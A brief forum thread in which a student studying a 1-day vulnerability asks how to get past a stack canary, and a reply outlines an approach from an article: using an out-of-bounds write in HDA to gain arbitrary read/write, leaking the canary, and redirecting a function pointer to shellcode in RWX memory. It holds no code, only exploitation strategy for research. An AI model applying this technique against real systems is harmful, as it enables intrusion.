about stackoverflow

[jeongzero8732]

hi i am student in korea.

I am currently conducting a 1-day case study based on the data. Currently, I have leaked and checked that the stack bof is up, but Canary is the problem. How to bypass this?

[QiuhaoLi]

There is an article which uses the same vulnerability. Leveraging the Out-of-Bound write to modify the buffer pointer fields in HDA, the author can get the arbitrary read/write primitives. With the primitives, you can leak the Canary content. But the author merely modifies a function pointer to a shellcode put in the RWX memory page and triggers it later.